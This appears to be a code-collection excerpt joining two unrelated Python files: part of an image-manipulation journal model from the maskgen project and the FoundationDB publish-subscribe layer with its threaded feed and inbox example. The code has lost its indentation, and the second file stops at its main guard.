return edge['maskname'] if 'maskname' in edge else ''
def maskImageFileTime(self):
if self.end is None:
return 0
return self.G.get_edge_image_file_time(self.start, self.end, 'maskname')
def maskImage(self, inputmask=False):
mask = self.G.get_edge_image(self.start, self.end, 'maskname')
if self.end is None or mask is None:
dim = (250, 250) if self.start is None else self.getImage(self.start).size
return ImageWrapper(np.zeros((dim[1], dim[0])).astype('uint8'))
return mask
def maskStats(self):
if self.end is None:
return ''
edge = self.G.get_edge(self.start, self.end)
if edge is None:
return ''
stat_names = ['ssim', 'psnr', 'local psnr', 'local ssim', 'shape change', 'masks count', 'change size category',
'change size ratio']
return ' '.join([key + ': ' + formatStat(value) for key, value in edge.items() if key in stat_names])
def currentImage(self):
if self.end is not None:
return self.getImageAndName(self.end)
elif self.start is not None:
return self.getImageAndName(self.start)
return None, None
def selectNode(self, name):
if self.G.has_node(name):
self.start = name
self.end = None
def selectEdge(self, start, end):
if self.G.has_node(start):
self.start = start
if self.G.has_node(end):
self.end = end
def remove(self, children=False):
import copy
s = self.start
e = self.end
list_to_process= []
if children:
list_to_process = copy.copy(self.G.successors(self.end if self.end is not None else self.start))
def remove_children(children):
for child in children:
remove_children(self.G.successors(child))
self.G.remove(child)
print (child)
self.notify((child, None), 'remove')
remove_children(list_to_process)
""" Remove the selected node or edge """
if (self.start is not None and self.end is not None):
if children:
self.G.remove(self.end, None)
self.labelNodes(self.start)
else:
self.G.remove_edge(self.start, self.end)
self.labelNodes(self.start)
self.labelNodes(self.end)
self.end = None
else:
name = self.start if self.end is None else self.end
p = self.G.predecessors(self.start) if self.end is None else [self.start]
self.G.remove(name, None)
self.start = p[0] if len(p) > 0 else None
self.end = None
for node in p:
self.labelNodes(node)
self.notify((s, e), 'remove')
def getProjectData(self, item, default_value=None):
return self.G.getDataItem(item, default_value=default_value)
def setProjectData(self, item, value, excludeUpdate=False):
"""
:param item:
:param value:
:param excludeUpdate: True if the update does not change the update time stamp on the journal
:return:
"""
self.notify((item,value),'meta')
self.G.setDataItem(item, value, excludeUpdate=excludeUpdate)
def getVersion(self):
""" Return the graph/software versio n"""
return self.G.getVersion()
def isFrozen(self):
return self.G.isFrozen()
def getGraph(self):
"""
:return: underlying graph
@rtype: ImageGraph
"""
return self.G
def validate(self, external=False, status_cb=None):
""" Return the list of errors from all validation rules on the graph.
@rtype: list of ValidationMessage
"""
notifier = self.notify.get_notifier_by_type(notifiers.ValidationNotifier)
if notifier is not None and not notifier.total_errors == None:
return notifier.total_errors
self._executeSkippedComparisons(status_cb=status_cb)
logging.getLogger('maskgen').info('Begin validation for {}'.format(self.getName()))
total_errors = self.validator.run_graph_suite(self.getGraph(), external=external, status_cb=status_cb)
for prop in getProjectProperties():
if prop.mandatory:
item = self.G.getDataItem(prop.name)
if item is None or len(item.strip()) < 3:
total_errors.append(
ValidationMessage(Severity.ERROR,
'',
'',
'Project property ' + prop.description + ' is empty or invalid',
'Mandatory Property',
None))
if notifier is not None:
self.notify.replace(notifiers.ValidationNotifier(total_errors))
return total_errors
def assignColors(self):
level = 1
edgeMap = dict()
foundColors = 0
colors = []
edges = 0
for edge_id in self.G.get_edges():
edge = self.G.get_edge(edge_id[0], edge_id[1])
if edge['op'] == 'Donor':
continue
edges += 1
if 'linkcolor' in edge:
foundColors += 1
colors.append(edge['linkcolor'])
if edges == foundColors and len(set(colors)) ==foundColors:
return
for edge_id in self.G.get_edges():
edge = self.G.get_edge(edge_id[0], edge_id[1])
if edge['op'] == 'Donor':
continue
edgeMap[edge_id] = (level, None)
level = level + 1
redistribute_intensity(edgeMap)
for k, v in edgeMap.iteritems():
self.G.get_edge(k[0], k[1])['linkcolor'] = str(list(v[1])).replace('[', '').replace(']', '').replace(
',', '')
return edgeMap
def __assignLabel(self, node, label):
prior = self.G.get_node(node)['nodetype'] if 'nodetype' in self.G.get_node(node) else None
if prior != label:
self.G.update_node(node, nodetype=label)
self.notify(node, 'label')
def renameFileImages(self):
"""
:return: list of node ids renamed
"""
renamed = []
for node in self.getNodeNames():
self.labelNodes(node)
nodeData = self.G.get_node(node)
if nodeData['nodetype'] in ['final']:
logging.getLogger('maskgen').info('Inspecting {} for rename'.format(nodeData['file']))
suffix = os.path.splitext(nodeData['file'])[1].lower()
file_path_name = os.path.join(self.G.dir, nodeData['file'])
try:
new_file_name = md5_of_file(os.path.join(self.G.dir, nodeData['file'])) + suffix
fullname = os.path.join(self.G.dir, new_file_name)
except:
logging.getLogger('maskgen').error(
'Missing file or invalid permission: {} '.format(nodeData['file']))
continue
if not os.path.exists(fullname):
try:
os.rename(file_path_name, fullname)
renamed.append(node)
logging.getLogger('maskgen').info('Renamed {} to {} '.format(nodeData['file'], new_file_name))
self.G.update_node(node, file=new_file_name)
except Exception as e:
try:
logging.getLogger('maskgen').error(
('Failure to rename file {} : {}. Trying copy').format(file_path_name, str(e)))
shutil.copy2(file_path_name, fullname)
logging.getLogger('maskgen').info(
'Renamed {} to {} '.format(nodeData['file'], new_file_name))
self.G.update_node(node, file=new_file_name)
except:
continue
else:
logging.getLogger('maskgen').warning('New name ' + new_file_name + ' already exists')
self.G.update_node(node, file=new_file_name)
self.save()
return renamed
def labelNodes(self, destination):
baseNodes = []
donorNodes = []
terminalNodes = []
candidateBaseDonorNodes = self._findBaseNodes(destination, excludeDonor=False)
for baseCandidate in candidateBaseDonorNodes:
foundTerminalNodes = self._findTerminalNodes(baseCandidate, excludeDonor=True)
terminalNodes.extend(foundTerminalNodes)
if len(foundTerminalNodes) > 0:
baseNodes.append(baseCandidate)
else:
donorNodes.append(baseCandidate)
for node in donorNodes:
self.__assignLabel(node, 'donor')
for node in baseNodes:
self.__assignLabel(node, 'base')
if len(self.G.successors(destination)) == 0:
if len(self.G.predecessors(destination)) == 0:
self.__assignLabel(destination, 'base')
else:
self.__assignLabel(destination, 'final')
elif len(self.G.predecessors(destination)) > 0:
self.__assignLabel(destination, 'interim')
elif 'nodetype' not in self.G.get_node(destination):
self.__assignLabel(destination, 'base')
def finalNodes(self):
final = []
for name in self.getNodeNames():
node = self.G.get_node(name)
if node['nodetype'] == 'final':
final.append(name)
return final
def baseNodes(self):
bases = []
for name in self.getNodeNames():
node = self.G.get_node(name)
if node['nodetype'] == 'base':
bases.append(name)
return bases
def _findTerminalNodes(self, node, excludeDonor=False, includeOps=None):
terminalsWithOps = self._findTerminalNodesWithCycleDetection(node, visitSet=list(), excludeDonor=excludeDonor)
return [terminalWithOps[0] for terminalWithOps in terminalsWithOps if
includeOps is None or len(set(includeOps).intersection(terminalWithOps[1])) > 0]
def _findTerminalNodesWithCycleDetection(self, node, visitSet=list(), excludeDonor=False):
succs = self.G.successors(node)
if len(succs) == 0:
return [(node, [])]
res = list()
for succ in succs:
if succ in visitSet:
continue
op = self.G.get_edge(node, succ)['op']
if op == 'Donor' and excludeDonor:
continue
visitSet.append(succ)
terminals = self._findTerminalNodesWithCycleDetection(succ,
visitSet=visitSet,
excludeDonor=excludeDonor)
for term in terminals:
term[1].append(op)
res.extend(terminals)
return res
def _findEdgesWithCycleDetection(self, node, excludeDonor=True, visitSet=list()):
preds = self.G.predecessors(node)
res = list()
for pred in preds:
if pred in visitSet:
continue
edge = self.G.get_edge(pred, node)
isNotDonor = (edge['op'] != 'Donor' or not excludeDonor)
if isNotDonor:
visitSet.append(pred)
res.append(EdgeTuple(start=pred, end=node, edge=edge))
res.extend(self._findEdgesWithCycleDetection(pred, excludeDonor=excludeDonor,
visitSet=visitSet) if isNotDonor else list())
return res
def _findBaseNodes(self, node, excludeDonor=True):
return [item[0] for item in mask_rules.findBaseNodesWithCycleDetection(self.G, node, excludeDonor=excludeDonor)]
def _findBaseNodesAndPaths(self, node, excludeDonor=True):
return [(item[0], item[2]) for item in mask_rules.findBaseNodesWithCycleDetection(self.G,node, excludeDonor=excludeDonor)]
def isDonorEdge(self, start, end):
edge = self.G.get_edge(start, end)
if edge is not None:
return edge['op'] == 'Donor'
return False
def getTerminalToBasePairs(self, suffix='.jpg'):
"""
find all pairs of leaf nodes to matching base nodes
:return list of tuples (leaf, base)
@rtype: list of (str,str)
"""
endPointTuples = self.getTerminalAndBaseNodeTuples()
pairs = list()
for endPointTuple in endPointTuples:
matchBaseNodes = [baseNode for baseNode in endPointTuple[1] if
suffix is None or self.G.get_pathname(baseNode).lower().endswith(suffix)]
if len(matchBaseNodes) > 0:
# if more than one base node, use the one that matches the name of the project
projectNodeIndex = matchBaseNodes.index(self.G.get_name()) if self.G.get_name() in matchBaseNodes else 0
baseNode = matchBaseNodes[projectNodeIndex]
startNode = endPointTuple[0]
# perfect match
# if baseNode == self.G.get_name():
# return [(startNode,baseNode)]
pairs.append((startNode, baseNode))
return pairs
def imageFromGroup(self, grp, software=None, **kwargs):
"""
:param grp:
:param software:
:param kwargs:
:return:
@type grp GroupFilter
@type software Software
"""
import copy
pairs_composite = []
resultmsgs = []
kwargs_copy = copy.copy(kwargs)
for filter in grp.filters:
msg, pairs = self.mediaFromPlugin(filter, software=software,
**kwargs_copy)
if msg is not None:
resultmsgs.extend(msg)
if len(pairs) == 0:
break
mod = self.getModificationForEdge(self.start,self.end)
for key,value in mod.arguments.iteritems():
if key not in kwargs_copy or not self.getGraph().isEdgeFilePath('arguments.' + key):
kwargs_copy[key] = value
pairs_composite.extend(pairs)
return resultmsgs, pairs_composite
def canPreviewMask(self):
allowed = self.getStartType() == 'video' or self.getEndType() == 'video'
modification = self.getCurrentEdgeModification()
edge = self.G.get_edge(self.start, self.end)
allowed &= getValue(edge, 'videomasks', None) is not None
op = getOperation(modification.operationName)
compare_func = op.getVideoCompareFunction()
allowed &= video_tools.Previewable(compare_func, modification.arguments)
return 'disabled' if not allowed else 'normal'
def substitutesAllowed(self):
allowed = False
modification = self.getCurrentEdgeModification()
if modification is not None:
allowed = getValue(modification.arguments, 'videoinputmaskname', '')
return 'disabled' if not allowed else 'normal'
def hasSubstituteMasks(self):
edge = self.getGraph().get_edge(self.start, self.end)
subs = getValue(edge, 'substitute videomasks', [])
return len(subs) > 0
def removeSubstituteMasks(self):
if self.hasSubstituteMasks():
edge = self.getGraph().get_edge(self.start, self.end)
edge.pop('substitute videomasks')
def addSubstituteMasks(self, filename):
edge = self.getGraph().get_edge(self.start, self.end)
subs = self.getLinkTool(self.start, self.end).addSubstituteMasks(self.start,
self.end,
self,
edge['op'],
arguments=getValue(edge,'arguments',{}),
filename=filename)
if subs is not None:
for sub in subs:
sub.pop('mask')
edge['substitute videomasks'] = subs
self.getGraph().addEdgeFilePath('substitute videomasks.videosegment','')
self.notify((self.start, self.end), 'update_edge')
return subs is not None
def mediaFromPlugin(self, filter, software=None, passthru=False, description=None, **kwargs):
"""
Use a plugin to create a new media item and link.
This method is given the plugin name, Image, the full pathname of the image and any additional parameters
required by the plugin (name/value pairs).
The name of the resulting image contains the prefix of the input image file name plus an additional numeric index.
If requested by the plugin (return True), the Exif is copied from the input image to the resulting image.
The method resolves the donor parameter's name to the donor's image file name.
If a donor is used, the method creates a Donor link from the donor image to the resulting image node.
If an input mask file is used, the input mask file is moved into the project directory.
Prior to calling the plugin, the output file is created and populated with the contents of the input file for convenience.
The filter plugin must update or overwrite the contents.
The method returns tuple with an error message and a list of pairs (links) added. The error message may be none if no error occurred.
@type filter: str
@type im: ImageWrapper
@type filename: str
@rtype: list of (ValidationMessage, list of (str,str))
"""
im, filename = self.currentImage()
filetype= fileType(filename)
op = plugins.getOperation(filter)
suffix = os.path.splitext(filename)[1].lower()
preferred = plugins.getPreferredSuffix(filter,filetype=filetype)
if type(preferred) == dict:
preferred = preferred[filetype]
fullOp = buildFilterOperation(op)
resolved, donors, graph_args, suffix_override, donorargs = self._resolvePluginValues(kwargs, fullOp)
if suffix_override is not None:
suffix = suffix_override
elif preferred is not None:
if preferred in donors:
suffix = os.path.splitext(resolved[preferred])[1].lower()
else:
suffix = preferred
target = os.path.join(tempfile.gettempdir(), self.G.new_name(self.start, suffix=suffix))
shutil.copy2(filename, target)
try:
msg = None
self.__addEdgeFilePaths(fullOp)
try:
if getValue(kwargs,'$$-pass-thru') or passthru:
extra_args, warning_message = None,None
else:
extra_args, warning_message = plugins.callPlugin(filter, im, filename, target, **resolved)
except Exception as e:
msg = str(e)
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_tb(exc_traceback, limit=10, file=sys.stderr)
logging.getLogger('maskgen').error(
'Plugin {} failed with {} given node {} for arguments {}'.format(filter, str(e),self.start, str(resolved)))
extra_args = None
if msg is not None:
return self._pluginError(filter, msg), []
if extra_args is not None and 'rename_target' in extra_args:
filename = extra_args.pop('rename_target')
newtarget = os.path.join(os.path.split(target)[0], os.path.split(filename)[1])
shutil.copy2(target, newtarget)
target = newtarget
if extra_args is not None and 'override_target' in extra_args:
filename = extra_args.pop('override_target')
target = os.path.join(os.path.split(target)[0], os.path.split(filename)[1])
if extra_args is not None and 'output_files' in extra_args:
file_params = extra_args.pop('output_files')
for name, value in file_params.iteritems():
extra_args[name] = value
self.G.addEdgeFilePath('arguments.' + name, '')
opInfo = self.gopLoader.getOperationWithGroups(op['name'], fake=True)
description = Modification(op['name'], filter + ':' + op['description'] if description is None else description,
category=opInfo.category,
generateMask=opInfo.generateMask,
semanticGroups=graph_args['semanticGroups'] if 'semanticGroups' in graph_args else [],
recordMaskInComposite=opInfo.recordMaskInComposite(filetype) if
'recordMaskInComposite' not in kwargs else kwargs['recordMaskInComposite'])
sendNotifications = kwargs['sendNotifications'] if 'sendNotifications' in kwargs else True
skipRules = kwargs['skipRules'] if 'skipRules' in kwargs else False
if software is None:
software = Software(op['software'], op['version'], internal=True)
if 'recordInCompositeMask' in kwargs:
description.setRecordMaskInComposite(kwargs['recordInCompositeMask'])
experiment_id = kwargs['experiment_id'] if 'experiment_id' in kwargs else None
description.setArguments(
{k: v for k, v in graph_args.iteritems() if k not in ['semanticGroups','sendNotifications', 'skipRules', 'experiment_id']})
if extra_args is not None and type(extra_args) == type({}):
for k, v in extra_args.iteritems():
if k not in kwargs or v is not None:
description.arguments[k] = v
description.setSoftware(software)
description.setAutomated('yes')
edge_parameters = {'plugin_name': filter,'experiment_id': experiment_id}
if 'global operation' in kwargs:
edge_parameters['global operation'] = kwargs['global operation']
results2, status = self.addNextImage(target,
mod=description,
sendNotifications=sendNotifications,
skipRules=skipRules,
position=self._getCurrentPosition((75 if len(donors) > 0 else 0, 75)),
edge_parameters=edge_parameters,
node_parameters={
'experiment_id': experiment_id} if experiment_id is not None else {})
pairs = list()
errors = []
if warning_message is not None:
errors.append(ValidationMessage(Severity.WARNING,
self.start,
self.start,
warning_message,
'Plugin {}'.format(filter),
None))
if results2 is not None:
errors.extend(results2)
finally:
os.remove(target)
if status:
pairs.append((self.start, self.end))
if sendNotifications:
self.notify((self.start, self.end), 'connect')
for donor in donors:
_end = self.end
_start = self.start
self.selectNode(kwargs[donor])
mod = Modification('Donor', '',category='Donor',automated='yes',arguments=donorargs)
self.connect(_end,mod=mod)
pairs.append((kwargs[donor], _end))
self.select((_start, _end))
# donor error message is removed. This annoys me (rwgdrummer).
# really need to classify rules and skip certain categories
errors = removeErrorMessages(errors,lambda msg: 'donor' in msg)
return errors, pairs
def _resolvePluginValues(self, args, operation):
parameters = {}
stripped_args = {}
donors = []
arguments = copy.copy(operation.mandatoryparameters)
arguments.update(operation.optionalparameters)
for k, v in args.iteritems():
if k in arguments or k in {'sendNotifications',
'override_suffix',
'skipRules',
'semanticGroups',
'experiment_id',
'recordInCompositeMask',
'donorargs',
'index'}:
parameters[k] = v
# if arguments[k]['type'] != 'donor':
stripped_args[k] = v
for k, v in args.iteritems():
if k in arguments and \
arguments[k]['type'] == 'donor':
parameters[k] = self.getImageAndName(v)[1]
if parameters[k] is None:
if os.path.exists(v):
parameters[k] = v
else:
logging.getLogger('maskgen').error('Donor {} not found'.format(v))
donors.append(k)
for arg, info in arguments.iteritems():
if arg not in parameters and 'defaultvalue' in info and \
info['defaultvalue'] is not None:
parameters[arg] = info['defaultvalue']
return parameters, donors, stripped_args, \
args['override_suffix'] if 'override_suffix' in args else None, \
getValue(args,'donorargs',{})
def _pluginError(self, filter, msg):
if msg is not None and len(msg) > 0:
return [ValidationMessage(Severity.ERROR,
self.start,
self.start,
'Plugin ' + filter + ': ' + msg,
'Plugin {}'.format(filter),
None)]
return None
def scanNextImageUnConnectedImage(self):
"""Scan for an image node with the same prefix as the currently select image node.
Scan in lexicographic order.
Exlude images that have neighbors.
Return None if a image nodee is not found.
"""
selectionSet = [node for node in self.G.get_nodes() if not self.G.has_neighbors(node) and node != self.start]
selectionSet.sort()
if (len(selectionSet) > 0):
matchNameSet = [name for name in selectionSet if name.startswith(self.start)]
selectionSet = matchNameSet if len(matchNameSet) > 0 else selectionSet
return selectionSet[0] if len(selectionSet) > 0 else None
def scanNextImage(self):
"""
Scan for a file with the same prefix as the currently select image node.
Scan in lexicographic order.
Exlude image files with names ending in _mask or image files that are already imported.
Return None if a file is not found.
"""
if self.start is None:
return None, None
suffix = self.start
seriesName = self.getSeriesName()
if seriesName is not None:
prefix = seriesName
prefix = prefix[0:32] if len(prefix) > 32 else prefix
files = [self.G.get_node(node)['file'] for node in self.G.get_nodes()]
def filterFunction(file):
return os.path.split(file)[1] not in files and \
not (file.rfind('_mask') > 0) and \
not (file.rfind('_proxy') > 0)
def findFiles(dir, preFix, filterFunction):
set = [os.path.abspath(os.path.join(dir, filename)) for filename in os.listdir(dir) if
(filename.startswith(preFix)) and filterFunction(os.path.abspath(os.path.join(dir, filename)))]
set = sorted(set, key=lambda f: -os.stat(f).st_mtime)
return set
nfile = None
for file in findFiles(self.G.dir, prefix, filterFunction):
nfile = file
break
return self.G.openImage(nfile) if nfile is not None else None, nfile
def getDescriptions(self):
"""
:return: descriptions for all edges
@rtype list of Modification
"""
return [self.getModificationForEdge(edge[0], edge[1]) for edge in
self.G.get_edges()]
def openImage(self, nfile):
"""
:param nfile:
:return:
@rtype: (str, ImageWrapper)
"""
im = None
if nfile is not None and nfile != '':
im = self.G.openImage(nfile)
return nfile, im
def findEdgesByOperationName(self, opName):
return [edge for edge in [self.G.get_edge(edge[0], edge[1]) for edge in self.G.get_edges()]
if edge['op'] == opName]
def getPathExtender(self):
from services.probes import CompositeExtender
"""
:return: Extend the composite or donor through current operation
"""
#nodes = self._findTerminalNodes(self.start, excludeDonor=True)
#if len(nodes) > 0:
return CompositeExtender(self)
#else:
# return DonorExtender(self)
def export(self, location, include=[], redacted=[],notifier=None):
with self.lock:
self.clear_validation_properties()
self.compress(all=True)
path, errors = self.G.create_archive(location, include=include, redacted=redacted, notifier=notifier)
return path, [ValidationMessage(Severity.ERROR,error[0],error[1],error[2],'Export',None) for error in errors]
def export_path(self, location, redacted=[]):
"""
:param location:
:param redacted: a list of registered file paths to exclude @see ImageGraph.addEdgeFilePath
:return:
"""
if self.end is None and self.start is not None:
self.G.create_path_archive(location, self.start, redacted=redacted)
elif self.end is not None:
self.G.create_path_archive(location, self.end, redacted=redacted)
def _getCurrentPosition(self, augment):
if self.start is None:
return (50, 50)
startNode = self.G.get_node(self.start)
return ((startNode['xpos'] if startNode.has_key('xpos') else 50) + augment[0],
(startNode['ypos'] if startNode.has_key('ypos') else 50) + augment[1])
def getModificationForEdge(self, start, end):
"""
:param start:
:param end:
:param edge:
:return: Modification
@type start: str
@type end: str
@rtype: Modification
"""
end_node = self.G.get_node(end)
edge = self.G.get_edge(start, end)
if edge is None:
return None
default_ctime = end_node['ctime'] if 'ctime' in end_node else None
op = self.gopLoader.getOperationWithGroups(edge['op'], warning=True,fake=True)
return Modification(edge['op'],
edge['description'],
start=start,
end=end,
arguments=edge['arguments'] if 'arguments' in edge else {},
inputMaskName=edge['inputmaskname'] if 'inputmaskname' in edge and edge[
'inputmaskname'] and len(edge['inputmaskname']) > 0 else None,
changeMaskName=edge['maskname'] if 'maskname' in edge else None,
software=Software(edge['softwareName'] if 'softwareName' in edge else None,
edge['softwareVersion'] if 'softwareVersion' in edge else None,
'editable' in edge and edge['editable'] == 'no'),
recordMaskInComposite=edge[
'recordMaskInComposite'] if 'recordMaskInComposite' in edge else 'no',
semanticGroups=edge['semanticGroups'] if 'semanticGroups' in edge else None,
automated=edge['automated'] if 'automated' in edge else 'no',
username=edge['username'] if 'username' in edge else '',
ctime=edge['ctime'] if 'ctime' in edge else default_ctime,
errors=edge['errors'] if 'errors' in edge else list(),
maskSet=(VideoMaskSetInfo(edge['videomasks']) if (
'videomasks' in edge and len(edge['videomasks']) > 0) else None),
category=op.category,
generateMask=op.generateMask)
def getSemanticGroups(self, start, end):
edge = self.getGraph().get_edge(start, end)
if edge is not None:
return edge['semanticGroups'] if 'semanticGroups' in edge and edge['semanticGroups'] is not None else []
return []
def setSemanticGroups(self, start, end, grps):
"""
@type start: str
@type end: str
@type grps: list(str)
"""
edge = self.getGraph().get_edge(start, end)
if edge is not None:
self.getGraph().update_edge(start, end, semanticGroups=grps)
self.notify((self.start, self.end), 'update_edge')
def setProjectSummary(self):
groups = []
for edgeTuple in self.getGraph().get_edges():
edge = self.getGraph().get_edge(edgeTuple[0], edgeTuple[1])
semantic_groups = getValue(edge,'semanticGroups',[])
for group in semantic_groups:
if group not in groups:
groups.append(group)
self.setProjectData('semanticgroups', groups)
def set_validation_properties(self, qaState, qaPerson, qaComment, qaData):
import qa_logic
qa_logic.ValidationData(self,qaState,qaPerson,None,qaComment,qaData)
def clear_validation_properties(self):
import qa_logic
logic = qa_logic.ValidationData(self)
logic.clearProperties()
def set_probe_mask_memory(self, memory):
self.probeMaskMemory = memory
"""Not sure if this will ever see any use"""
def get_probe_mask_memory(self):
return self.probeMaskMemory
class VideoMaskSetInfo:
"""
Set of change masks video clips
"""
columnNames = ['Start', 'End', 'Frames', 'File']
func = [float,float,int,str]
columnKeys = ['starttime', 'endtime', 'frames', 'File']
columnValues = {}
def __init__(self, maskset):
self.maskset = maskset
self.columnValues = {'{:=02d}'.format(i):self._convert(maskset[i]) for i in range(len(maskset))}
def _convert(self, item):
return {'Start': self.tofloat(video_tools.get_start_time_from_segment(item)),
'End': self.tofloat(video_tools.get_end_time_from_segment(item)),
'Frames': video_tools.get_frames_from_segment(item),
'File': video_tools.get_file_from_segment(item,default_value='')}
def update(self, item_number, column, value):
video_tools.update_segment(self.maskset[item_number],
**{self.columnKeys[column] : self.func[column](value)})
video_tools.update_segment(self.maskset[item_number],rate= \
(video_tools.get_end_time_from_segment(self.maskset[item_number]) -
video_tools.get_start_time_from_segment(self.maskset[item_number])/
video_tools.get_frames_from_segment(self.maskset[item_number])))
def tofloat(self, o):
return o if o is None else float(o)
|
pubsub.py
|
#
# pubsub.py
#
# This source file is part of the FoundationDB open source project
#
# Copyright 2013-2018 Apple Inc. and the FoundationDB project authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""FoundationDB PubSub Layer.
Provides the PubSub class for message passing according to the publish-subscribe
pattern. PubSub methods supports operations on:
- Feeds, which publish messages
- Inboxes, which subscribe to feeds and receive messages from them
- Messages
The layer allows management of feeds and inboxes as well as message delivery. An
inbox can subscribe to any number of feeds. The inbox will then receive all
messages posted by each feed to which it subscribes. Subscriptions are
retroactive, so messages posted prior to subscription will become available once
a subscription is established.
"""
import simpledoc
feed_messages = simpledoc.OrderedIndex("messages.?", "fromfeed")
feeds = simpledoc.root.feeds
inboxes = simpledoc.root.inboxes
messages = simpledoc.root.messages
#####################################
# Transactions for SimpleDoc Access #
#####################################
@simpledoc.transactional
def _create_feed(name):
feed = feeds[name]
feed.set_value(name)
return feed
@simpledoc.transactional
def _create_inbox(name):
inbox = inboxes[name]
inbox.set_value(name)
return inbox
@simpledoc.transactional
def _create_feed_and_inbox(name):
feed = _create_feed(name)
inbox = _create_inbox(name)
return feed, inbox
# When creating a subscription, initialize the state of the feed as dirty in
# relation to the inbox as if there have been prior posts by the feed. There may
# in fact have been such posts, but this is the correct initial state regardless.
@simpledoc.transactional
def _create_subscription(inbox, feed):
inbox.subs[feed.get_name()] = ""
inbox.dirtyfeeds[feed.get_name()] = "1"
return True
@simpledoc.transactional
def _post_message(feed, contents):
message = messages.prepend()
message.set_value(contents)
message.fromfeed = feed.get_name()
# Mark the feed as dirty in relation to each watching inbox, setting the
# inbox to copy the feed the next time it gets messages
for inbox in feed.watchinginboxes.get_children():
inboxes[inbox.get_name()].dirtyfeeds[feed.get_name()] = "1"
# Clear all watching inboxes so the feed will not need to touch a subscribed
# inbox upon subsequent posts until the inbox has gotten its messages
feed.watchinginboxes.clear_all()
# Print without other side-effects.
@simpledoc.transactional
def _list_messages(inbox):
print "Messages in {}'s inbox:".format(inbox.get_value())
for feed in inbox.subs.get_children():
print " from {}:".format(feeds[feed.get_name()].get_value())
for message in feed_messages.find_all(feed.get_name()):
print " ", message.get_value()
# Read-only operation without side-effects.
@simpledoc.transactional
def _get_feed_messages(feed, limit):
message_list = []
counter = 0
for message in feed_messages.find_all(feed.get_name()):
if counter == limit:
break
message_list.append(message.get_value())
counter += 1
return message_list
# Read-only operation without side-effects.
@simpledoc.transactional
def _get_inbox_subscriptions(inbox, limit):
subscriptions = []
for message in inbox.subs.get_children():
subscriptions.append(message.get_name())
return subscriptions
# For each of an inbox's dirty feeds, copy the feed's new messages to the inbox
# and mark the inbox as watching the feed. Then unmark the feeds as dirty.
@simpledoc.transactional
def _copy_dirty_feeds(inbox):
changed = False
latest_id = inbox.latest_message.get_value()
for feed in inbox.dirtyfeeds.get_children():
for message in feed_messages.find_all(feed.get_name()):
if latest_id != None and message.get_name() >= latest_id:
break
changed = True
inbox.messages[message.get_name()] = feed.get_name()
feeds[feed.get_name()].watchinginboxes[inbox.get_name()] = "1"
inbox.dirtyfeeds.clear_all()
return changed
# Copy messages from an inbox's dirty feeds and update state accordingly. Return
# the most recent messages up to limit.
@simpledoc.transactional
def _get_inbox_messages(inbox, limit):
inbox_changed = _copy_dirty_feeds(inbox)
message_ids = []
for message in inbox.messages.get_children():
if len(message_ids) >= limit:
break
message_ids.append(message.get_name())
if inbox_changed and len(message_ids) > 0:
inbox.latest_message = message_ids[0]
return [messages[mid].get_value() for mid in message_ids]
@simpledoc.transactional
def _clear_all_messages():
simpledoc.root.clear_all()
@simpledoc.transactional
def _print_feed_stats(feed):
count = len(list(feed_messages.find_all(feed.get_name())))
print "{} messages in feed {}".format(count, feed.get_name())
# Pretty print the entire PubSub database from SimpleDoc
@simpledoc.transactional
def _print_pubsub():
print simpledoc.root.get_json(pretty=True)
################
# PubSub Class #
################
class PubSub(object):
def __init__(self, db):
self.db = db
def create_feed(self, name):
return _create_feed(self.db, name)
def create_inbox(self, name):
return _create_inbox(self.db, name)
def create_inbox_and_feed(self, name):
return _create_feed_and_inbox(self.db, name)
def get_feed_by_name(self, name):
return feeds[name]
def get_inbox_by_name(self, name):
return inboxes[name]
def create_subscription(self, feed, inbox):
return _create_subscription(self.db, feed, inbox)
def post_message(self, feed, contents):
return _post_message(self.db, feed, contents)
def list_inbox_messages(self, inbox):
return _list_messages(self.db, inbox)
def get_feed_messages(self, feed, limit=10):
return _get_feed_messages(self.db, feed, limit)
def get_inbox_subscriptions(self, inbox, limit=10):
return _get_inbox_subscriptions(self.db, inbox, limit)
def get_inbox_messages(self, inbox, limit=10):
return _get_inbox_messages(self.db, inbox, limit)
def clear_all_messages(self):
_clear_all_messages(self.db)
def print_feed_stats(self, feed):
_print_feed_stats(self.db, feed)
def print_pubsub(self):
_print_pubsub(self.db)
###################
# PubSub Example #
###################
# This example generates a simple topology with specified numbers of feeds and
# inboxes. Inboxes are randomly subscribed to feeds. Each feed and inbox is then
# run in its own thread. Feeds post a specified number of messages, waiting a
# random interval between messages. Each inbox is polled for messages received,
# terminating when no messages are received for a wait limit.
# Create the specified numbers of feeds and inboxes. Subscribe each inbox to a
# randomly selected subset of feeds.
def setup_topology(feeds, inboxes):
feed_map = {f: ps.create_feed('Alice ' + str(f)) for f in range(feeds)}
inbox_map = {}
for i in range(inboxes):
inbox_map[i] = ps.create_inbox('Bob ' + str(i))
for f in random.sample(xrange(feeds), random.randint(1, feeds)):
ps.create_subscription(inbox_map[i], feed_map[f])
return feed_map, inbox_map
# Post a fixed number of messages, waiting a random interval under 1 sec
# between each message
def feed_driver(feed, messages):
for i in range(messages):
ps.post_message(feed, 'Message {} from {}'.format(i, feed.get_name()))
time.sleep(random.random())
def get_and_print_inbox_messages(inbox, limit=10):
print "\nMessages to {}:".format(inbox.get_name())
for m in ps.get_inbox_messages(inbox, limit):
print " ->", m
# Poll the inbox every 0.1 sec, getting and printing messages received,
# until no messages have been received for 1.1 sec
def inbox_driver(inbox):
wait_limit = 1.1
wait_inc = 0.1
waited = 0.0
changed = False
latest = None
while True:
get_and_print_inbox_messages(inbox)
changed = (latest != inbox.latest_message)
latest = inbox.latest_message
if not changed and waited > wait_limit:
break
waited += wait_inc
time.sleep(wait_inc)
# Generate and run a thread for each feed and each inbox.
def run_threads(feed_map, inbox_map, messages):
feed_threads = [threading.Thread(target=feed_driver, args=(feed_map[id], messages))
for id in feed_map]
inbox_threads = [threading.Thread(target=inbox_driver, args=(inbox_map[id],))
for id in inbox_map]
for f in feed_threads:
f.start()
for i in inbox_threads:
i.start()
for f in feed_threads:
f.join()
for i in inbox_threads:
i.join()
def sample_pubsub(feeds, inboxes, messages):
feed_map, inbox_map = setup_topology(feeds, inboxes)
run_threads(feed_map, inbox_map, messages)
if __name__ == "__main__":
